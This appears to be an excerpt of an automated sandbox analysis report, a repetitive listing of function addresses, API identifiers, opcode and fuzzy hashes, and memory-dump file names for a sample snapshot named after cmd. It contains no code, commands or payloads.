                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1010374628-0
                                                                                                                                                                                                                                      • Opcode ID: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
                                                                                                                                                                                                                                      • Instruction ID: 967919287facac05207b067226576afe8e0108a6b44c2344376db64b3aae3a63
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A02BD23F1E64680FA65BB11EC11679E694AF05BA0FC586B4ED5E863D2DF3CF4819320
                                                                                                                                                                                                                                      Function 00007FF70AF0DACC Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: gfffffff
                                                                                                                                                                                                                                      • API String ID: 0-1523873471
                                                                                                                                                                                                                                      • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                      • Instruction ID: 6ec8042ff54e0c90a9cba593b0782bd30fecc48b02cdba95f44bbb6af76cfd37
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FFA14563A097C646FB21DF69E800BA9BB91AF60B84F858072DE8D87785DF3DE501C710
                                                                                                                                                                                                                                      Function 00007FF70AF08804 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID: TMP
                                                                                                                                                                                                                                      • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                      • Opcode ID: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                                                      • Instruction ID: 6019a3c179b613b83a9a39c5c041b49a3b4c1429e8344001c0b9f2b003021ff5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07518F13F1874241FA64BA26DD019BAE2916F84BC4FC841B4DE4E877D6EF3CF40682A4
                                                                                                                                                                                                                                      Function 00007FF70AF134F0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                                                                                      • Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                                      • Instruction ID: 6744a00715bb9743119bd2c6327d51eb426881e2e52f650c84f4d1ff7acc56cb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5FB09222E07A42C2FA097B21AC8221862A47F48701FD842B8C41C44330DF2CB0E95720
                                                                                                                                                                                                                                      Function 00007FF70AF03610 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                                      • Instruction ID: e552834739db9888fa94a9e1b37f2d986b01319420b98d26decf36e93768f467
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01D1D767A0C64285FB28AE29C950A3DA7A1EF45B88F944375CE0D8B795DF3DF845C320
                                                                                                                                                                                                                                      Function 00007FF70AEF9870 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                                      • Instruction ID: e36f5dc5100920d754e5d8565c647e788d8a2e8087a4e546df12ca49efc9e1e4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8C1AE722181E18BD289EA29E87947A73D1FB8930DBD5406BEF87476C6C73CA514DB20
                                                                                                                                                                                                                                      Function 00007FF70AF02C80 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                                      • Instruction ID: 856e74ad32036fa6863058a9d8fd883cf8086bc6a44279d960b9b03cf07d678e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4B19D73A0878585FB64AF39C8585BCBBA4EB45B88FA401B5CB4D87395CF29E841C730
                                                                                                                                                                                                                                      Function 00007FF70AF0E5E0 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                                      • Instruction ID: 9b39593c6dad9e38680b5cea38545e8865aeea5fef5aae6ff3b9e1f1ab52483a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3481E173A1838186F774AB29E840B7AAA91FF457D4F944675DA9D83B95CF3CE4008B10
                                                                                                                                                                                                                                      Function 00007FF70AF16488 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                      • Opcode ID: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
                                                                                                                                                                                                                                      • Instruction ID: f036d346edad6e107e0e637a2f04107476978029971e02dd195caa3af6348d93
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F961D423E0829246FBA4AA28C85467DE681AF40764FD542B9DA5DCB7D5DF6DF8008B20
                                                                                                                                                                                                                                      Function 00007FF70AF021D4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                      • Instruction ID: 02e677233d2480c7fd4f05a164665e99806bd23f289788e7f3c35f179f93e709
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94517133A1865186F7649B69C448AB8B3A0EF55B68F644171CF8D87794CF3AF843C760
                                                                                                                                                                                                                                      Function 00007FF70AF019B4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                      • Instruction ID: cbc133a56752af4bbdcacbc030a72a3a7c013e31bf808407ad6f49dabcfdd602
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E251B077A1865182F7249B28C840B39B3A0EF44B68FA44271CE8D977A4DF3AF843C754
                                                                                                                                                                                                                                      Function 00007FF70AF01DC4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                      • Instruction ID: 88b5ba53a3b1a8d07e7f71686d69661f350d2952774cbf823977c11f817431b2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D519037A1865282F7249B29C840A3CB3A0EF48B68F644371DE4C877A4CB3AF853C754
                                                                                                                                                                                                                                      Function 00007FF70AF01BC0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                      • Instruction ID: bad50515f1b04a1ae956838ae098f9e3a70070ab6f5b01fb8b3bd065c1f8e065
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4851C437A1865186F7249B29C840B78B7A0EF45B58FA58271CE8C97794CF3AF883C754
                                                                                                                                                                                                                                      Function 00007FF70AF01FD0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                      • Instruction ID: 3d1b2013d3162e81e47a75486e4d0774f1cbb28553d5e62af59c17ac4d6d160c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2551A173A1875185F7249B28C848AB8B7A0EF54B58FA44171CF4C977A8DB3AFC42C760
                                                                                                                                                                                                                                      Function 00007FF70AF017B0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                      • Instruction ID: c8741d17199962f581fa0367ff3a2fc569e4e1dfb8bac8a5b434003243da94d8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5351B037A1865186F7249B28C840A3DB7A1EF44F58FA45271CE4C97798CF3AF942C794
                                                                                                                                                                                                                                      Function 00007FF70AF05DA0 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
